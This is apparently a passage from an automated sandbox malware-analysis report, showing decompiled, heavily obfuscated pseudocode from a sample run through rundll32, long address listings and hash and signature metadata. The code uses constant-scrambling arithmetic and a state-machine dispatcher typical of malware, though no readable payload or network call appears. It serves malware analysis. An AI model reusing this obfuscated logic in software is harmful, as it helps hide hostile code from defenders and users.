				_v1832 = _v1832 + 0xffff18c0;
				_v1832 = _v1832 ^ 0x4a717db2;
				_v1832 = _v1832 << 8;
				_v1832 = _v1832 ^ 0x4fcf9c5e;
				_v1732 = 0x9e099a;
				_v1732 = _v1732 ^ 0xff857814;
				_v1732 = _v1732 + 0xffffca1f;
				_v1732 = _v1732 ^ 0xff111531;
				_v1776 = 0x4db87;
				_v1776 = _v1776 + 0xffff62f5;
				_v1776 = _v1776 ^ 0x44009895;
				_v1776 = _v1776 << 2;
				_v1776 = _v1776 ^ 0x101849e4;
				_v1708 = 0xd244cf;
				_v1708 = _v1708 >> 9;
				_t637 = 0x3a;
				_v1708 = _v1708 * 0x11;
				_v1708 = _v1708 ^ 0x000db4cc;
				_v1636 = 0xf59e87;
				_v1636 = _v1636 + 0xffff8d09;
				_v1636 = _v1636 ^ 0x00f1a368;
				_v1724 = 0x2bdcc8;
				_v1724 = _v1724 * 0x51;
				_v1724 = _v1724 * 0x5d;
				_v1724 = _v1724 ^ 0x0aa2c27a;
				_v1828 = 0x689116;
				_v1828 = _v1828 + 0xfffffd09;
				_v1828 = _v1828 / _t637;
				_t638 = 0x67;
				_v1828 = _v1828 / _t638;
				_v1828 = _v1828 ^ 0x000cd418;
				_v1692 = 0xa047a9;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 ^ 0x0505fbf3;
				_v1616 = 0xb6eb58;
				_v1616 = _v1616 ^ 0x8fb73430;
				_v1616 = _v1616 ^ 0x8f037651;
				_v1752 = 0x713cbb;
				_t639 = 0x59;
				_v1752 = _v1752 / _t639;
				_v1752 = _v1752 | 0x24e66ff7;
				_v1752 = _v1752 ^ 0x24e68565;
				_v1760 = 0x2ce68a;
				_v1760 = _v1760 + 0xf472;
				_v1760 = _v1760 >> 6;
				_v1760 = _v1760 ^ 0x000e4d4e;
				_v1764 = 0xb3dbfb;
				_v1764 = _v1764 * 0x44;
				_v1764 = _v1764 ^ 0x846d2ad4;
				_v1764 = _v1764 ^ 0xaba28cf9;
				_v1632 = 0xed14fe;
				_v1632 = _v1632 + 0x899;
				_v1632 = _v1632 ^ 0x00e7b355;
				_v1640 = 0x173d8;
				_v1640 = _v1640 | 0x072f8d22;
				_v1640 = _v1640 ^ 0x0725dc6d;
				_v1704 = 0xb743b;
				_v1704 = _v1704 * 0x22;
				_v1704 = _v1704 ^ 0x7ac75999;
				_v1704 = _v1704 ^ 0x7b4b4761;
				_v1648 = 0x376518;
				_t640 = 0x2b;
				_v1648 = _v1648 / _t640;
				_v1648 = _v1648 ^ 0x0009ae4a;
				_v1656 = 0x799ab2;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x00024b68;
				_v1688 = 0x532d8e;
				_v1688 = _v1688 + 0xeacd;
				_t641 = 0x1f;
				_v1688 = _v1688 / _t641;
				_v1688 = _v1688 ^ 0x000bfc86;
				_v1696 = 0x1a47c3;
				_t642 = 0x35;
				_v1696 = _v1696 * 0x3c;
				_v1696 = _v1696 * 0x79;
				_v1696 = _v1696 ^ 0xe948599c;
				_v1788 = 0x31ddc5;
				_v1788 = _v1788 / _t642;
				_v1788 = _v1788 | 0x1a71d74c;
				_v1788 = _v1788 ^ 0xb8e3b14c;
				_v1788 = _v1788 ^ 0xa29596cb;
				_v1796 = 0xb7daa1;
				_v1796 = _v1796 + 0xffff2907;
				_v1796 = _v1796 >> 1;
				_t643 = 0x19;
				_v1796 = _v1796 * 0x38;
				_v1796 = _v1796 ^ 0x140afc74;
				_v1680 = 0x68ee60;
				_t407 =  &_v1680; // 0x68ee60
				_v1680 =  *_t407 / _t643;
				_t413 =  &_v1680; // 0x68ee60
				_t644 = 0x4b;
				_v1680 =  *_t413 / _t644;
				_v1680 = _v1680 ^ 0x000d0b0c;
				_v1624 = 0x50062a;
				_v1624 = _v1624 + 0xffffe4c0;
				_v1624 = _v1624 ^ 0x004144d3;
				_v1772 = 0x8d0174;
				_v1772 = _v1772 | 0x883a70ab;
				_t645 = 0x7c;
				_v1772 = _v1772 / _t645;
				_v1772 = _v1772 + 0x6c34;
				_v1772 = _v1772 ^ 0x01154615;
				_v1780 = 0x3c67da;
				_v1780 = _v1780 ^ 0x3b09705b;
				_t646 = 0x39;
				_v1780 = _v1780 / _t646;
				_v1780 = _v1780 | 0x19d7c010;
				_v1780 = _v1780 ^ 0x19d74af7;
				_v1664 = 0x6ef7ab;
				_v1664 = _v1664 >> 0x10;
				_v1664 = _v1664 ^ 0x00064358;
				_v1712 = 0x6e7286;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 + 0xffff7147;
				_v1712 = _v1712 ^ 0x03763b5e;
				_v1720 = 0x51f33b;
				_v1720 = _v1720 * 0x24;
				_v1720 = _v1720 | 0x382a3589;
				_v1720 = _v1720 ^ 0x3ba3189b;
				_v1672 = 0xa7c9a6;
				_v1672 = _v1672 | 0x6235af6b;
				_v1672 = _v1672 ^ 0x62b8a2b2;
				_t706 = _v1596;
				while(1) {
					L1:
					_t602 = 0x4d28763;
					while(1) {
						L2:
						_t647 = 0x87702da;
						L3:
						while(_t708 != 0x23fa72) {
							if(_t708 == 0x2649e52) {
								_push(_v1656);
								_push(_v1648);
								_push(_v1704);
								_push( &_v1564);
								_push( &_v1592);
								_push(_v1640);
								_push(_t647);
								_push(0);
								_t605 = E00349700(0, _v1632, __eflags);
								_t714 = _t713 + 0x20;
								__eflags = _t605;
								if(_t605 == 0) {
									L27:
									return _t605;
								}
								E00354DAD(_v1688, _v1696, _v1592, _v1788, _v1796);
								_t713 = _t714 + 0xc;
								_push(_v1780);
								_push(_v1772);
								_t696 = _v1624;
								_push(_v1588);
								_t650 = _v1680;
								L26:
								return E00354DAD(_t650, _t696);
							}
							if(_t708 == 0x3216d22) {
								_push(_v1672);
								_push(_v1720);
								_t696 = _v1712;
								_push(_v1596);
								_t650 = _v1664;
								goto L26;
							}
							if(_t708 == 0x6088cb4) {
								__eflags = _t706 - _t602;
								if(__eflags != 0) {
									_t708 = 0xd3ee486;
									continue;
								}
								_push(_t647);
								_t605 = E0034B41A(_v1608, _v1768,  &_v1596, _v1804, _v1736);
								_t713 = _t713 + 0x14;
								__eflags = _t605;
								if(__eflags == 0) {
									goto L27;
								}
								_t708 = 0xd3ee486;
								while(1) {
									L1:
									_t602 = 0x4d28763;
									L2:
									_t647 = 0x87702da;
									goto L3;
								}
							}
							if(_t708 == 0x7bff6cd) {
								_t612 = E0034B186();
								__eflags = _t612 - E00349685(_t647);
								_t602 = 0x4d28763;
								_t708 = 0x6088cb4;
								_t706 =  !=  ? 0x4d28763 : 0x58d295;
								goto L2;
							}
							if(_t708 == _t647) {
								_push(_v1596);
								_t615 = E0035363D( &_v1564, _v1832, _v1732, _v1776, _v1708,  &_v1592, _t647);
								_t713 = _t713 + 0x1c;
								__eflags = _t615;
								if(__eflags != 0) {
									E00354DAD(_v1636, _v1724, _v1592, _v1828, _v1692);
									E00354DAD(_v1616, _v1752, _v1588, _v1760, _v1764);
									_t713 = _t713 + 0x18;
								}
								L11:
								_t708 = 0x3216d22;
								goto L1;
							}
							_t727 = _t708 - 0xd3ee486;
							if(_t708 != 0xd3ee486) {
								L21:
								__eflags = _t708 - 0x61b4f51;
								if(__eflags != 0) {
									continue;
								}
								return _t602;
							}
							E003612A8(_t647, _v1824, _t727, _v1800, _v1668,  &_v1044);
							 *((short*)(E00354FA8(_v1676,  &_v1044, _v1700, _v1728))) = 0;
							E00348650(_v1620,  &_v524, _t727, _v1756);
							_push(_v1716);
							_push(_v1660);
							_push(0x34183c);
							E0034E7CE(E0034AB66(_v1600, _v1748, _t727), _t727, _v1684,  &_v1044, _v1600, _v1816, _v1612, _v1784, _v1652,  &_v524);
							E0034AE03(_v1792, _v1740, _v1644, _t622);
							_t627 = E0035C38F(_v1604,  &_v1564, _t629, _v1808);
							_t713 = _t713 + 0x54;
							if(_t627 != 0) {
								_t602 = 0x4d28763;
								__eflags = _t706 - 0x4d28763;
								_t647 = 0x87702da;
								_t708 =  ==  ? 0x87702da : 0x2649e52;
								continue;
							}
							goto L11;
						}
						_t708 = 0x7bff6cd;
						goto L21;
					}
				}
			}




































































































                                                                                                                      0x00342fa7
                                                                                                                      0x00342fb1
                                                                                                                      0x00342fb9
                                                                                                                      0x00342fc4
                                                                                                                      0x00342fcf
                                                                                                                      0x00342fd7
                                                                                                                      0x00342fdf
                                                                                                                      0x00342fe4
                                                                                                                      0x00342fec
                                                                                                                      0x00342ff4
                                                                                                                      0x00342ffe
                                                                                                                      0x00343000
                                                                                                                      0x00343005
                                                                                                                      0x0034300a
                                                                                                                      0x00343015
                                                                                                                      0x00343018
                                                                                                                      0x0034301c
                                                                                                                      0x00343024
                                                                                                                      0x0034302c
                                                                                                                      0x00343034
                                                                                                                      0x00343041
                                                                                                                      0x00343045
                                                                                                                      0x0034304d
                                                                                                                      0x00343058
                                                                                                                      0x00343063
                                                                                                                      0x0034306e
                                                                                                                      0x00343076
                                                                                                                      0x00343086
                                                                                                                      0x0034308a
                                                                                                                      0x00343092
                                                                                                                      0x0034309a
                                                                                                                      0x003430a5
                                                                                                                      0x003430ad
                                                                                                                      0x003430b8
                                                                                                                      0x003430c0
                                                                                                                      0x003430c9
                                                                                                                      0x003430cc
                                                                                                                      0x003430d0
                                                                                                                      0x003430d8
                                                                                                                      0x003430e0
                                                                                                                      0x003430e8
                                                                                                                      0x003430ed
                                                                                                                      0x003430f5
                                                                                                                      0x003430fd
                                                                                                                      0x00343105
                                                                                                                      0x0034310a
                                                                                                                      0x00343114
                                                                                                                      0x00343118
                                                                                                                      0x00343120
                                                                                                                      0x00343128
                                                                                                                      0x0034312d
                                                                                                                      0x00343132
                                                                                                                      0x0034313a
                                                                                                                      0x00343142
                                                                                                                      0x0034314d
                                                                                                                      0x00343155
                                                                                                                      0x00343160
                                                                                                                      0x0034316b
                                                                                                                      0x00343176
                                                                                                                      0x00343181
                                                                                                                      0x0034318c
                                                                                                                      0x0034319c
                                                                                                                      0x003431a3
                                                                                                                      0x003431b0
                                                                                                                      0x003431b8
                                                                                                                      0x003431c0
                                                                                                                      0x003431c5
                                                                                                                      0x003431cd
                                                                                                                      0x003431d8
                                                                                                                      0x003431e3
                                                                                                                      0x003431ee
                                                                                                                      0x003431f6
                                                                                                                      0x003431fb
                                                                                                                      0x00343203
                                                                                                                      0x0034320b
                                                                                                                      0x00343216
                                                                                                                      0x0034321e
                                                                                                                      0x00343229
                                                                                                                      0x00343231
                                                                                                                      0x00343236
                                                                                                                      0x0034323e
                                                                                                                      0x00343246
                                                                                                                      0x00343251
                                                                                                                      0x0034325c
                                                                                                                      0x00343267
                                                                                                                      0x00343272
                                                                                                                      0x0034327d
                                                                                                                      0x00343288
                                                                                                                      0x00343293
                                                                                                                      0x0034329e
                                                                                                                      0x003432a6
                                                                                                                      0x003432b1
                                                                                                                      0x003432bc
                                                                                                                      0x003432c4
                                                                                                                      0x003432c9
                                                                                                                      0x003432d1
                                                                                                                      0x003432d9
                                                                                                                      0x003432e1
                                                                                                                      0x003432ec
                                                                                                                      0x003432f7
                                                                                                                      0x00343302
                                                                                                                      0x00343310
                                                                                                                      0x00343315
                                                                                                                      0x0034331b
                                                                                                                      0x00343328
                                                                                                                      0x0034332b
                                                                                                                      0x0034332f
                                                                                                                      0x00343337
                                                                                                                      0x0034334a
                                                                                                                      0x00343351
                                                                                                                      0x0034335c
                                                                                                                      0x00343364
                                                                                                                      0x00343369
                                                                                                                      0x00343371
                                                                                                                      0x00343379
                                                                                                                      0x00343381
                                                                                                                      0x00343389
                                                                                                                      0x00343396
                                                                                                                      0x0034339a
                                                                                                                      0x003433a2
                                                                                                                      0x003433ad
                                                                                                                      0x003433b5
                                                                                                                      0x003433c0
                                                                                                                      0x003433cb
                                                                                                                      0x003433d3
                                                                                                                      0x003433de
                                                                                                                      0x003433eb
                                                                                                                      0x003433ec
                                                                                                                      0x003433f6
                                                                                                                      0x003433fc
                                                                                                                      0x00343400
                                                                                                                      0x00343408
                                                                                                                      0x00343410
                                                                                                                      0x00343418
                                                                                                                      0x00343420
                                                                                                                      0x00343425
                                                                                                                      0x0034342d
                                                                                                                      0x00343435
                                                                                                                      0x0034343d
                                                                                                                      0x00343445
                                                                                                                      0x0034344d
                                                                                                                      0x00343455
                                                                                                                      0x0034345d
                                                                                                                      0x00343465
                                                                                                                      0x0034346a
                                                                                                                      0x00343472
                                                                                                                      0x0034347d
                                                                                                                      0x0034348f
                                                                                                                      0x00343492
                                                                                                                      0x00343499
                                                                                                                      0x003434a4
                                                                                                                      0x003434af
                                                                                                                      0x003434ba
                                                                                                                      0x003434c5
                                                                                                                      0x003434d8
                                                                                                                      0x003434e7
                                                                                                                      0x003434ee
                                                                                                                      0x003434f9
                                                                                                                      0x00343501
                                                                                                                      0x00343511
                                                                                                                      0x00343519
                                                                                                                      0x0034351e
                                                                                                                      0x00343524
                                                                                                                      0x0034352c
                                                                                                                      0x00343537
                                                                                                                      0x0034353f
                                                                                                                      0x00343547
                                                                                                                      0x00343552
                                                                                                                      0x0034355d
                                                                                                                      0x00343568
                                                                                                                      0x00343573
                                                                                                                      0x0034357f
                                                                                                                      0x00343582
                                                                                                                      0x00343586
                                                                                                                      0x0034358e
                                                                                                                      0x00343596
                                                                                                                      0x0034359e
                                                                                                                      0x003435a6
                                                                                                                      0x003435ab
                                                                                                                      0x003435b3
                                                                                                                      0x003435c0
                                                                                                                      0x003435c4
                                                                                                                      0x003435cc
                                                                                                                      0x003435d4
                                                                                                                      0x003435df
                                                                                                                      0x003435ea
                                                                                                                      0x003435f5
                                                                                                                      0x00343600
                                                                                                                      0x0034360b
                                                                                                                      0x00343616
                                                                                                                      0x00343629
                                                                                                                      0x00343630
                                                                                                                      0x0034363b
                                                                                                                      0x00343648
                                                                                                                      0x0034365c
                                                                                                                      0x00343661
                                                                                                                      0x0034366a
                                                                                                                      0x00343675
                                                                                                                      0x00343680
                                                                                                                      0x00343688
                                                                                                                      0x00343693
                                                                                                                      0x0034369e
                                                                                                                      0x003436b0
                                                                                                                      0x003436b5
                                                                                                                      0x003436be
                                                                                                                      0x003436c9
                                                                                                                      0x003436dc
                                                                                                                      0x003436df
                                                                                                                      0x003436ee
                                                                                                                      0x003436f5
                                                                                                                      0x00343700
                                                                                                                      0x00343710
                                                                                                                      0x00343714
                                                                                                                      0x0034371c
                                                                                                                      0x00343724
                                                                                                                      0x0034372c
                                                                                                                      0x00343734
                                                                                                                      0x0034373c
                                                                                                                      0x00343745
                                                                                                                      0x00343748
                                                                                                                      0x0034374c
                                                                                                                      0x00343754
                                                                                                                      0x0034375f
                                                                                                                      0x0034376a
                                                                                                                      0x00343771
                                                                                                                      0x00343778
                                                                                                                      0x0034377d
                                                                                                                      0x00343786
                                                                                                                      0x00343791
                                                                                                                      0x0034379c
                                                                                                                      0x003437a7
                                                                                                                      0x003437b2
                                                                                                                      0x003437ba
                                                                                                                      0x003437c6
                                                                                                                      0x003437cb
                                                                                                                      0x003437d1
                                                                                                                      0x003437d9
                                                                                                                      0x003437e1
                                                                                                                      0x003437e9
                                                                                                                      0x003437f5
                                                                                                                      0x003437f8
                                                                                                                      0x003437fc
                                                                                                                      0x00343804
                                                                                                                      0x0034380c
                                                                                                                      0x00343817
                                                                                                                      0x00343824
                                                                                                                      0x0034382f
                                                                                                                      0x0034383a
                                                                                                                      0x00343842
                                                                                                                      0x0034384d
                                                                                                                      0x00343858
                                                                                                                      0x0034386b
                                                                                                                      0x00343872
                                                                                                                      0x0034387d
                                                                                                                      0x00343888
                                                                                                                      0x00343893
                                                                                                                      0x0034389e
                                                                                                                      0x003438a9
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x00000000
                                                                                                                      0x003438ba
                                                                                                                      0x003438cc
                                                                                                                      0x00343b5f
                                                                                                                      0x00343b6d
                                                                                                                      0x00343b74
                                                                                                                      0x00343b7b
                                                                                                                      0x00343b83
                                                                                                                      0x00343b84
                                                                                                                      0x00343b92
                                                                                                                      0x00343b93
                                                                                                                      0x00343b97
                                                                                                                      0x00343b9c
                                                                                                                      0x00343b9f
                                                                                                                      0x00343ba1
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bf7
                                                                                                                      0x00343bc0
                                                                                                                      0x00343bc5
                                                                                                                      0x00343bc8
                                                                                                                      0x00343bcc
                                                                                                                      0x00343bd0
                                                                                                                      0x00343bd7
                                                                                                                      0x00343bde
                                                                                                                      0x00343be5
                                                                                                                      0x00000000
                                                                                                                      0x00343bea
                                                                                                                      0x003438d4
                                                                                                                      0x00343b37
                                                                                                                      0x00343b3e
                                                                                                                      0x00343b45
                                                                                                                      0x00343b4c
                                                                                                                      0x00343b53
                                                                                                                      0x00000000
                                                                                                                      0x00343b53
                                                                                                                      0x003438e0
                                                                                                                      0x00343add
                                                                                                                      0x00343adf
                                                                                                                      0x00343b17
                                                                                                                      0x00000000
                                                                                                                      0x00343b17
                                                                                                                      0x00343ae1
                                                                                                                      0x00343afd
                                                                                                                      0x00343b02
                                                                                                                      0x00343b05
                                                                                                                      0x00343b07
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00343b0d
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b0
                                                                                                                      0x003438b5
                                                                                                                      0x003438b5
                                                                                                                      0x00000000
                                                                                                                      0x003438b5
                                                                                                                      0x003438b0
                                                                                                                      0x003438ec
                                                                                                                      0x00343ab8
                                                                                                                      0x00343ac4
                                                                                                                      0x00343acb
                                                                                                                      0x00343ad0
                                                                                                                      0x00343ad5
                                                                                                                      0x00000000
                                                                                                                      0x00343ad5
                                                                                                                      0x003438f4
                                                                                                                      0x00343a1d
                                                                                                                      0x00343a4a
                                                                                                                      0x00343a4f
                                                                                                                      0x00343a52
                                                                                                                      0x00343a54
                                                                                                                      0x00343a76
                                                                                                                      0x00343a98
                                                                                                                      0x00343a9d
                                                                                                                      0x00343a9d
                                                                                                                      0x003439fd
                                                                                                                      0x003439fd
                                                                                                                      0x00000000
                                                                                                                      0x003439fd
                                                                                                                      0x003438fa
                                                                                                                      0x00343900
                                                                                                                      0x00343b26
                                                                                                                      0x00343b26
                                                                                                                      0x00343b2c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00343b2c
                                                                                                                      0x0034391d
                                                                                                                      0x00343950
                                                                                                                      0x0034395a
                                                                                                                      0x00343962
                                                                                                                      0x00343969
                                                                                                                      0x0034397b
                                                                                                                      0x003439c1
                                                                                                                      0x003439d9
                                                                                                                      0x003439f1
                                                                                                                      0x003439f6
                                                                                                                      0x003439fb
                                                                                                                      0x00343a04
                                                                                                                      0x00343a0e
                                                                                                                      0x00343a10
                                                                                                                      0x00343a15
                                                                                                                      0x00000000
                                                                                                                      0x00343a15
                                                                                                                      0x00000000
                                                                                                                      0x003439fb
                                                                                                                      0x00343b21
                                                                                                                      0x00000000
                                                                                                                      0x00343b21
                                                                                                                      0x003438b5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Fs$+M$4l$5N$AX$[e$[p;$^ "0$`h$aGK{$x`~${2$@"
                                                                                                                      • API String ID: 0-3551049037
                                                                                                                      • Opcode ID: 43f7302fdcaf2a012deef5b53f6b9c9f981160d5e2646994b90374987bd6801a
                                                                                                                      • Instruction ID: 45c4cb285c84ef8f2afcae057e99faec72e0649fecd4aada6b0c3c9aaa21ed27
                                                                                                                      • Opcode Fuzzy Hash: 43f7302fdcaf2a012deef5b53f6b9c9f981160d5e2646994b90374987bd6801a
                                                                                                                      • Instruction Fuzzy Hash: 0C5200715093818FD379CF21C54AB9BBBE2BBC4708F10891DE6DA9A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00349A7D Relevance: 15.7, Strings: 12, Instructions: 679COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00349A7D(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t761;
				void* _t762;
				void* _t764;
				void* _t768;
				intOrPtr _t770;
				void* _t775;
				void* _t784;
				void* _t796;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				void* _t814;
				void* _t880;
				intOrPtr* _t900;
				signed int _t902;
				void* _t903;
				void* _t907;
				void* _t908;
				void* _t915;

				_v120 = 0xaf91c9;
				_v120 = _v120 * 0xc;
				_t900 = __ecx;
				_v120 = _v120 ^ 0x083ad56c;
				_t907 = 0;
				_v160 = 0xdd67b2;
				_t796 = 0x60e8fa3;
				_v160 = _v160 + 0xffff9007;
				_v160 = _v160 ^ 0x00dcf7b9;
				_v128 = 0xd2bb52;
				_v128 = _v128 + 0x4dd6;
				_v128 = _v128 ^ 0x00d30928;
				_v340 = 0x29bf77;
				_v340 = _v340 | 0xa59b3ed7;
				_t802 = 0x26;
				_v84 = __ecx;
				_v340 = _v340 * 0x24;
				_v340 = _v340 / _t802;
				_v340 = _v340 ^ 0x02102f1f;
				_v136 = 0x5cee52;
				_t31 =  &_v136; // 0x5cee52
				_v136 =  *_t31 * 0x7d;
				_v136 = _v136 ^ 0x2d605e0a;
				_v108 = 0xa45e80;
				_v108 = _v108 | 0x375210cb;
				_v108 = _v108 ^ 0x37f65ecb;
				_v280 = 0xda067f;
				_v280 = _v280 / _t802;
				_v280 = _v280 + 0xffff2a0f;
				_v280 = _v280 ^ 0x0004e6dc;
				_v272 = 0x722186;
				_v272 = _v272 ^ 0xa185ec82;
				_v272 = _v272 ^ 0x3ba6498b;
				_v272 = _v272 ^ 0x9a51848f;
				_v292 = 0x4e3196;
				_v292 = _v292 + 0xb94f;
				_v292 = _v292 * 0x4e;
				_v292 = _v292 ^ 0x180b91c6;
				_v208 = 0x6998d9;
				_v208 = _v208 >> 0xe;
				_v208 = _v208 ^ 0x000001a6;
				_v240 = 0x4e7103;
				_v240 = _v240 * 0x4c;
				_v240 = _v240 ^ 0xd0eec6a6;
				_v240 = _v240 ^ 0xc7a74a42;
				_v312 = 0x7234ec;
				_v312 = _v312 ^ 0x522d2006;
				_v312 = _v312 << 6;
				_v312 = _v312 + 0x869a;
				_v312 = _v312 ^ 0x97c5c11a;
				_v364 = 0xaf3901;
				_v364 = _v364 + 0xffff0df3;
				_v364 = _v364 + 0xacd;
				_v364 = _v364 << 6;
				_v364 = _v364 ^ 0x2b91257f;
				_v244 = 0x42065a;
				_v244 = _v244 >> 8;
				_v244 = _v244 + 0x3d61;
				_v244 = _v244 ^ 0x000e9124;
				_v308 = 0x462496;
				_v308 = _v308 >> 1;
				_v308 = _v308 << 8;
				_v308 = _v308 + 0xc751;
				_v308 = _v308 ^ 0x2311deb1;
				_v372 = 0x2d527a;
				_v372 = _v372 >> 0xe;
				_v372 = _v372 << 0xb;
				_t902 = 0x27;
				_t803 = 0x29;
				_v372 = _v372 * 0x71;
				_v372 = _v372 ^ 0x027ecd5f;
				_v332 = 0xa669b;
				_v332 = _v332 >> 7;
				_v332 = _v332 + 0xd2e3;
				_v332 = _v332 >> 0xa;
				_v332 = _v332 ^ 0x000f2e3e;
				_v168 = 0x4e96bd;
				_v168 = _v168 << 3;
				_v168 = _v168 ^ 0x02701882;
				_v112 = 0xaba749;
				_v112 = _v112 / _t902;
				_v112 = _v112 ^ 0x0003e5b7;
				_v176 = 0xf83e47;
				_v176 = _v176 + 0xf669;
				_v176 = _v176 ^ 0x00f8a104;
				_v416 = 0x697041;
				_v416 = _v416 | 0x82970019;
				_v416 = _v416 / _t803;
				_v416 = _v416 + 0xffffd466;
				_v416 = _v416 ^ 0x0334f61d;
				_v252 = 0x15ebd3;
				_v252 = _v252 | 0x6e052c00;
				_t804 = 0x67;
				_v252 = _v252 / _t804;
				_v252 = _v252 ^ 0x0113ba89;
				_v276 = 0x344c30;
				_v276 = _v276 | 0x5d3660a5;
				_v276 = _v276 ^ 0x29f3ee58;
				_v276 = _v276 ^ 0x74c4d850;
				_v400 = 0xfbb174;
				_v400 = _v400 << 7;
				_v400 = _v400 ^ 0xf4a56f7f;
				_v400 = _v400 + 0xb6a2;
				_v400 = _v400 ^ 0x897127f1;
				_v408 = 0xeb5219;
				_v408 = _v408 + 0x740f;
				_v408 = _v408 << 0x10;
				_t805 = 0x65;
				_v408 = _v408 / _t805;
				_v408 = _v408 ^ 0x01f5cec8;
				_v268 = 0xb10ed5;
				_t806 = 0x6b;
				_v268 = _v268 * 0x79;
				_v268 = _v268 | 0x0fb1f039;
				_v268 = _v268 ^ 0x5fbe4096;
				_v132 = 0x68a9ad;
				_v132 = _v132 | 0x3a05ff43;
				_v132 = _v132 ^ 0x3a6b0a8d;
				_v392 = 0x795a70;
				_v392 = _v392 >> 0xd;
				_v392 = _v392 * 0x48;
				_v392 = _v392 / _t806;
				_v392 = _v392 ^ 0x000937af;
				_v236 = 0x1e45d1;
				_t807 = 0x32;
				_v236 = _v236 / _t807;
				_v236 = _v236 + 0xffffc842;
				_v236 = _v236 ^ 0x0007e8a5;
				_v228 = 0x827416;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x0826c6ea;
				_v284 = 0xd86f33;
				_v284 = _v284 << 0xe;
				_v284 = _v284 + 0xcd5c;
				_v284 = _v284 ^ 0x1bc78313;
				_v380 = 0x51f478;
				_v380 = _v380 | 0x2ab41351;
				_t808 = 0x6a;
				_v380 = _v380 / _t808;
				_v380 = _v380 ^ 0x7d9f8aa1;
				_v380 = _v380 ^ 0x7df5e8b9;
				_v192 = 0x594da7;
				_v192 = _v192 + 0xffff4010;
				_v192 = _v192 ^ 0x00542d8e;
				_v324 = 0x9c8afa;
				_t809 = 0x1e;
				_v324 = _v324 / _t809;
				_v324 = _v324 >> 0xb;
				_v324 = _v324 / _t902;
				_v324 = _v324 ^ 0x0001b8f0;
				_v212 = 0xd229d7;
				_v212 = _v212 << 3;
				_v212 = _v212 ^ 0x069444ca;
				_v288 = 0xa34a44;
				_v288 = _v288 ^ 0x8cd8fe8c;
				_v288 = _v288 + 0xffff9af8;
				_v288 = _v288 ^ 0x8c7655cb;
				_v220 = 0x9493db;
				_v220 = _v220 | 0x71cebed0;
				_v220 = _v220 ^ 0x71dfb10a;
				_v224 = 0xf1176b;
				_v224 = _v224 + 0xffffb0e2;
				_v224 = _v224 ^ 0x00f1becf;
				_v352 = 0xae98d2;
				_v352 = _v352 + 0xffffb89b;
				_v352 = _v352 * 0x11;
				_v352 = _v352 + 0x4d1e;
				_v352 = _v352 ^ 0x0b9fceb7;
				_v180 = 0x84b950;
				_v180 = _v180 >> 0xc;
				_v180 = _v180 ^ 0x00015b12;
				_v360 = 0x38dd65;
				_v360 = _v360 << 8;
				_v360 = _v360 << 0xb;
				_v360 = _v360 + 0xffffe7b0;
				_v360 = _v360 ^ 0xeb2159a9;
				_v188 = 0x175413;
				_v188 = _v188 | 0xeaa62ca7;
				_v188 = _v188 ^ 0xeab1c509;
				_v196 = 0x89f8f3;
				_v196 = _v196 | 0x84cde34a;
				_v196 = _v196 ^ 0x84ce03e9;
				_v204 = 0xfa0198;
				_v204 = _v204 + 0xba3a;
				_v204 = _v204 ^ 0x00fbcf1f;
				_v368 = 0x243d47;
				_v368 = _v368 + 0x6af1;
				_v368 = _v368 * 0x18;
